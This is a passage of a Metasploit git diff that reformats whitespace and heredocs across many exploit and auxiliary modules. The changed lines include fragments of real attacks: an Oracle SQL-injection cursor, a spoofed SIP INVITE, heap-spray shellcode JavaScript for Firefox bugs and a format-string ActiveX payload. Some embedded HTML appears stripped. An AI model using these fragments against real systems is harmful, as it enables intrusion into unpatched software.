reconnaissance', '208.67.222.222']), + OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), + OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), + ], self.class) - deregister_options('FILTER','PCAPFILE') + deregister_options('FILTER','PCAPFILE') end def auxiliary_commands return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server" - } + } end def cmd_racer(*args) diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 249427e96f..4c4f0de5ba 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server", - } + } end def cmd_racer(*args) diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb index d19e812b9a..c178a48f14 100644 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ b/modules/auxiliary/spoof/wifi/airpwn.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Airpwn' ] + [ 'Airpwn' ] ], 'PassiveActions' => [ @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary rescue EOFError rescue ::Exception => e print_error("AIRPWN: failed to parse response file " \ - "#{r['file']}, #{e.class} #{e} #{e.backtrace}") + "#{r['file']}, #{e.class} #{e} #{e.backtrace}") end end else diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 261f392e46..cec57104b3 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -49,14 +49,15 @@ class Metasploit3 < Msf::Auxiliary p = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - cursor = " - DECLARE - #{p} NUMBER; - BEGIN - #{p} := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); - SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); - END;" + cursor = <<-EOF +DECLARE +#{p} NUMBER; +BEGIN +#{p} := DBMS_SQL.OPEN_CURSOR; +DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); +SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); +END; +EOF begin print_status("Sending Evil Cursor and SQLI...") diff --git a/modules/auxiliary/test/capture.rb b/modules/auxiliary/test/capture.rb index 395d03ec4b..42fa358f3d 100644 --- a/modules/auxiliary/test/capture.rb +++ b/modules/auxiliary/test/capture.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Sniffer' ] + [ 'Sniffer' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/test/eth_spoof.rb b/modules/auxiliary/test/eth_spoof.rb index b954636220..4e60f7d1b8 100644 --- a/modules/auxiliary/test/eth_spoof.rb +++ b/modules/auxiliary/test/eth_spoof.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Spoofer' ] + [ 'Spoofer' ] ], 'DefaultAction' => 'Spoofer' ) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index e658fed70b..f3aaa7b39d 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -41,23 +41,26 @@ class Metasploit3 < Msf::Auxiliary begin - name=datastore['MSG'] - src=datastore['SRCADDR'] - connect_udp + name = datastore['MSG'] + src = datastore['SRCADDR'] + connect_udp - print_status("Sending Fake SIP Invite to: #{ip}") - req = "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n" - req << "To: <sip:#{ip}>" + "\r\n" - req << "Via: SIP/2.0/UDP #{ip}" + "\r\n" - req << "From: \"#{name}\"<sip:#{src}>" + "\r\n" - req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n" - req << "CSeq: 1 INVITE" + "\r\n" - req << "Max-Forwards: 20" + "\r\n" - req << "Contact: <sip:127.0.0.1>" + "\r\n\r\n" - udp_sock.put(req) - disconnect_udp + print_status("Sending Fake SIP Invite to: #{ip}") + + req = "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n" + req << "To: <sip:#{ip}>" + "\r\n" + req << "Via: SIP/2.0/UDP #{ip}" + "\r\n" + req << "From: \"#{name}\"<sip:#{src}>" + "\r\n" + req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n" + req << "CSeq: 1 INVITE" + "\r\n" + req << "Max-Forwards: 20" + "\r\n" + req << "Contact: <sip:127.0.0.1>" + "\r\n\r\n" + + udp_sock.put(req) + disconnect_udp rescue Errno::EACCES end + end end \ No newline at end of file diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 2424212c51..c9be1cb2da 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -38,12 +38,11 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback register_options( [ - OptString.new('STAT_KEY', - [ true, + OptString.new('STAT_KEY', [ true, "STAT key from target host (see tools/context/stat-key utility)", - "0x00000000"]), - OptString.new('STAT_FILE', [ true, "name of file to stat(2)", "/bin/ls"]), - ], self.class) + "0x00000000" ]), + OptString.new('STAT_FILE', [ true, "name of file to stat(2)", "/bin/ls" ]), + ], self.class) end def obtain_key(buf, badchars, state) diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 01ac0d0171..7f4b9d2ece 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2004-2221'], + [ 'CVE', '2004-2221'], [ 'OSVDB', '9011'], [ 'BID', '10926'], ], diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 3a862516be..495ed21dcf 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2004-0608'], + [ 'CVE', '2004-0608'], [ 'OSVDB', '7217'], [ 'BID', '10570'], diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index c7446421ea..6cfcb6e695 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -92,8 +92,9 @@ class Metasploit3 < Msf::Exploit::Remote # print_status("Malicious request sent, do_ej should be overwritten") req = c.request_cgi({ 'uri' => "/apply.cgi", - 'method' => 'POST', - 'data' => post_data }) + 'method' => 'POST', + 'data' => post_data + }) c.send_request(req) print_status("Mayhem sent") diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 1db02189e2..a5596834a5 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-1148'], - ['OSVDB', '23777'], + ['OSVDB', '23777'], ['BID', '17040'], ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index 56a3ed1ed6..03cf4f1187 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -141,8 +141,9 @@ class Metasploit3 < Msf::Exploit::Remote len = datastore['LENGTH'].to_i seq = [rand(255)].pack('n') jmpesp = target['JMPESP'] # jmp esp in vdso - scan_iterate_ra=target['scan_iterate_ra'] # address just after the call - # in ieee80211_scan_iterate in wlan.ko + + # address just after the call (in ieee80211_scan_iterate in wlan.ko) + scan_iterate_ra=target['scan_iterate_ra'] if scan_iterate_ra howtoreturn = "RETURN_PROPERLY" # Return to the parent of giwscan_cb parent diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 6e01b21733..d2d4342e7b 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -107,8 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote var_data_str1 = Rex::Text.rand_text_alpha(3) var_data_str2 = Rex::Text.rand_text_alpha(4) - js = %Q^ - + js = <<-EOF var xunescape = unescape; var shellcode = xunescape("#{enc_code}"); @@ -117,7 +116,7 @@ oneblock = xunescape("#{enc_ret}"); var fullblock = oneblock; while (fullblock.length < #{target['BlockLen']}) { - fullblock += fullblock; + fullblock += fullblock; } var sprayContainer = new Array(); @@ -144,56 +143,56 @@ var searchArray = new Array(); function escapeData(data) { - var xi; - var xc; - var escData=''; - for(xi=0; xi<data.length; xi++) - { - xc=data.charAt(xi); - if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc); - escData+=xc; - } - return escData; + var xi; + var xc; + var escData=''; + for(xi=0; xi<data.length; xi++) + { + xc=data.charAt(xi); + if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc); + escData+=xc; + } + return escData; } function DataTranslator() { - searchArray = new Array(); - searchArray[0] = new Array(); - searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}"; - var newElement = document.getElementById("content"); - if (document.getElementsByTagName) { - var xi=0; - pTags = newElement.getElementsByTagName("p"); - if (pTags.length > 0) - while (xi < pTags.length) - { - oTags = pTags[xi].getElementsByTagName("font"); - searchArray[xi+1] = new Array(); - if (oTags[0]) { - searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML; - } - xi++; - } - } + searchArray = new Array(); + searchArray[0] = new Array(); + searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}"; + var newElement = document.getElementById("content"); + if (document.getElementsByTagName) { + var xi=0; + pTags = newElement.getElementsByTagName("p"); + if (pTags.length > 0) + while (xi < pTags.length) + { + oTags = pTags[xi].getElementsByTagName("font"); + searchArray[xi+1] = new Array(); + if (oTags[0]) { + searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML; + } + xi++; + } + } } function GenerateHTML() { - var xhtml = ""; - for (xi=1;xi<searchArray.length;xi++) - { - xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]); - } + var xhtml = ""; + for (xi=1;xi<searchArray.length;xi++) + { + xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]); + } } setInterval("fill_function()", .5); -^ +EOF # Obfuscate it up a bit js = obfuscate_js(js, 'Symbols' => { 'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function } - }).to_s + }).to_s str1 = Rex::Text.rand_text_alpha(20) str2 = Rex::Text.rand_text_alpha(24) diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index e7cb5feb03..1589d86e1e 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -78,43 +78,43 @@ class Metasploit3 < Msf::Exploit::Remote enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) - return %Q| + return <<-EOF <html> <head> - <title>One second please... - +function FillHeap() { + // Filler + var m = ""; + var h = ""; + var a = 0; + + // Nop sled + for(a=0; a<(1024*256); a++) + m += unescape("#{enc_nops}"); + + // Payload + m += unescape("#{enc_code}"); + + // Repeat + for(a=0; a<1024; a++) + h += m; + + // Return + return h; +} + - | +EOF end end diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 3c63ff386e..3d6d5700a1 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_X86, 'Addr' => 'ATe' }, - ] + ] ], 'DisclosureDate' => 'Jun 01 2009', 'DefaultTarget' => 0)) @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote # Return back an example URL. Using an iframe doesn't work with all # browsers, but that's easy enough to fix if you need to. return String(<<-EOS) - iTunes loading . . . - - -

iTunes should open automatically, but if it doesn't, click to - continue.

- - - EOS +iTunes loading . . . + + +

iTunes should open automatically, but if it doesn't, click to +continue.

a + + +EOS end def on_request_uri(cli, request) diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 7776108f31..fe3afff5da 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2009-3867' ], [ 'OSVDB', '59711' ], - [ 'BID', '36881' ], + [ 'BID', '36881' ], [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-09-076/' ] ], 'Payload' => @@ -175,18 +175,20 @@ No automatic targetting for now ... def generate_html(pl) - html = %Q| - - - - - - - - - + html = <<-EOF + + + + + + + + + + -| +EOF + # finalize the html jar_name = rand_text_alphanumeric(32) html.gsub!(/JARNAME/, jar_name) diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index add9609552..51630e99f5 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2009-3869' ], [ 'OSVDB', '59710' ], - [ 'BID', '36881' ], + [ 'BID', '36881' ], [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ], ], @@ -164,18 +164,19 @@ No automatic targetting for now ... def generate_html(pl) - html = %Q| - - - - - - - - - + html = <<-EOF + + + + + + + + + + -| +EOF # finalize html jar_name = rand_text_alphanumeric(32)+".jar" html.gsub!(/JARNAME/, jar_name) diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 4da03413b8..53b4097026 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -135,10 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote def get_code - appletsource = %Q^ -/* - */ - + appletsource = <<-EOF import java.applet.Applet; import java.io.ByteArrayInputStream; import java.io.ObjectInputStream; @@ -338,9 +335,12 @@ public class #{datastore['APPLETNAME']} extends Applet catch( Exception e ) { System.out.println("Payload instantiation error: " + e); } } } -}^ - appletcode = { 'classnames' => [ datastore['APPLETNAME'] ] , - 'codefiles' => [ appletsource ] } +} +EOF + appletcode = { + 'classnames' => [ datastore['APPLETNAME'] ], + 'codefiles' => [ appletsource ] + } return appletcode end @@ -401,12 +401,15 @@ public class #{datastore['APPLETNAME']} extends Applet @signedjar = "#{datastore['APPLETNAME']}.jar" build_jar( unsignedjar, - [ # Applet - datastore['APPLETNAME'] + ".class", - # PayloadX class - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", - # PayloadX StreamConnector for pure Java payload - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) + [ + # Applet + datastore['APPLETNAME'] + ".class", + # PayloadX class + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", + # PayloadX StreamConnector for pure Java payload + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" + ] + ) print_status "Jar built. Signing..." diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index d6357c3b44..ed5819f5c3 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2005-2265'], ['OSVDB', '17968'], - ['BID', '14242'], + ['BID', '14242'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'], ], 'Payload' => @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Exploit::Remote One second please... -
-
+
+
EOF diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index 9dfae070ed..d63762c68f 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -145,7 +145,7 @@ for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter #{j_format} = unescape("#{write}"); #{j_format} += '%#{ret}x'; for (#{j_counter} = 0; #{j_counter} < 22; #{j_counter}++) - #{j_format} += '%x'; + #{j_format} += '%x'; #{j_format} += '%hn'; #{axobj}.#{method} = #{j_format}; diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index bdbefc9df2..3ce4e5171c 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 03 2008' diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index 996fab374d..32aa8d684a 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -92,38 +92,36 @@ class Metasploit3 < Msf::Exploit::Remote # Build out the message - content = %Q| - - - - - - | - - + content = <<-EOF + + + + + +EOF print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index a1e92f56e7..0c19e8ac13 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], # Patched [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index e9975cf556..e0fd432409 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultOptions' => { diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 3f38b7f3ab..8b3bdabe50 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 20 2007')) diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index a4a863d6d3..40a184d974 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2006-6707'], + [ 'CVE', '2006-6707'], [ 'OSVDB', '32399'], [ 'URL', 'http://secunia.com/advisories/23463' ], ], diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index 53b3bcac6c..3a41d0d03a 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2005-4560'], - ['OSVDB', '21987'], + ['OSVDB', '21987'], ['MSB', 'MS06-001'], - ['BID', '16074'], + ['BID', '16074'], ['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'], ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'], ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'], diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index f7e2cab46f..d5f90aa43e 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2006-1359'], ['OSVDB', '24050'], - ['MSB', 'MS06-013'], + ['MSB', 'MS06-013'], ['BID', '17196'], ['US-CERT-VU', '876678'], ['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'], diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index f8dd90f75d..a3bc4fa2ad 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 07 2008')) diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index 3abddc89a9..cbc7ef6ab2 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary - code. + code. }, 'License' => MSF_LICENSE, 'Author' => [ 'koshi', 'MC' ], diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 00fe0ce8f9..a3d8fe5d22 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X > - ]]> + ]]> @@ -245,7 +245,7 @@ class Metasploit3 < Msf::Exploit::Remote SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X > - ]]> + ]]> diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index 3336ce383a..3efa4d697e 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -1,5 +1,5 @@ ## -# $Id: novelliprint_getdriversettings.rb +# $Id: novelliprint_getdriversettings.rb$ ## ### diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 70e9b59b1c..b03c050f5f 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Persits XUpload ActiveX MakeHttpRequest Directory Traversal', - 'Description' => %q{ + 'Name' => 'Persits XUpload ActiveX MakeHttpRequest Directory Traversal', + 'Description' => %q{ This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5. By passing a string containing "..\\" sequences to the MakeHttpRequest method, diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index 1c0690267b..51fbcd0c27 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -38,14 +38,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 2048, 'StackAdjustment' => -3500, }, - 'DefaultOptions' => + 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'Sep 07 2009', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 22987d3115..e51652548d 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'Jan 15 2009', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index 884af45b1f..ae0b529ff9 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2008')) diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 1190ea3be4..ad96979209 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ # Tested with ActiveX v2.0.0.1020 and v2.0.2008.801 - [ 'Windows Universal', + [ 'Windows Universal', { 'Ret' => 0x0c0c0c0c # heap sprayed # 0x746C15A9 # p/p/r in msls31.dll diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index d904667b76..7c5a807514 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2008-5492'], + [ 'CVE', '2008-5492'], [ 'OSVDB', '49871'], [ 'BID','32313' ], ], diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 735dd72cbf..ae9ce4aaa1 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ # Tested with atucfobj.dll v20.2008.2601.4928 - [ 'Windows Universal', { 'Ret' => 0x0c0c0c0c } ], + [ 'Windows 